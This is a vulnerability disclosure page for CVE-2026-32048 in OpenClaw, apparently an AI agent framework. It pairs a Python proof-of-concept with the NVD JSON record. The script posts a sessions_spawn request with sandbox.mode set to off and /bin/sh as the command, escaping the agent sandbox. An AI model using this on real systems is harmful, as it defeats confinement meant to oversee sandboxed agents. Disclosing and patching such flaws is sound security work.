CVE-2026-32048

# PoC Concept for CVE-2026-32048 # This script demonstrates how a sandboxed session might spawn an unsandboxed process. import requests import json TARGET_URL = "http://vulnerable-openclaw-agent:8080/api/v1/sessions_spawn" # The session token obtained within the sandboxed environment SANDBOXED_SESSION_TOKEN = "sandbox_session_token_here" def exploit_sandbox_escape(): headers = { "Authorization": f"Bearer {SANDBOXED_SESSION_TOKEN}", "Content-Type": "application/json" } # Payload designed to turn off sandbox mode in the child process payload = { "spawn_target": "cross_agent", "config": { "runtime": "default", # Vulnerability: System fails to enforce inheritance, allowing explicit off "sandbox.mode": "off", "cmd": "/bin/sh" } } try: print("[*] Attempting to spawn unsandboxed child process...") response = requests.post(TARGET_URL, headers=headers, data=json.dumps(payload)) if response.status_code == 200: result = response.json() print("[+] Exploit successful!") print(f"[+] New Process PID: {result.get('pid')}") print("[+] Sandbox mode: OFF") else: print(f"[-] Request failed with status {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": exploit_sandbox_escape()

{"cve": {"id": "CVE-2026-32048", "sourceIdentifier": "[email protected]", "published": "2026-03-21T01:17:07.510", "lastModified": "2026-03-24T19:13:59.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.3.1 fail to enforce sandbox inheritance during cross-agent sessions_spawn operations, allowing sandboxed sessions to create child processes under unsandboxed agents. An attacker with a sandboxed session can exploit this to spawn child runtimes with sandbox.mode set to off, bypassing runtime confinement restrictions."}, {"lang": "es", "value": "Las versiones de OpenClaw anteriores a 2026.3.1 fallan en aplicar la herencia de sandbox durante las operaciones de sessions_spawn entre agentes, permitiendo que las sesiones en sandbox creen procesos hijo bajo agentes sin sandbox. Un atacante con una sesión en sandbox puede explotar esto para generar entornos de ejecución hijo con sandbox.mode configurado en off, eludiendo las restricciones de confinamiento del entorno de ejecución."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.3.1", "matchCriteriaId": "66AA451A-A5AE-4FD7-B42C-A868D720F4DF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-p7gr-f84w-hqg5", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-sandbox-escape-via-cross-agent-sessions-spawn", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}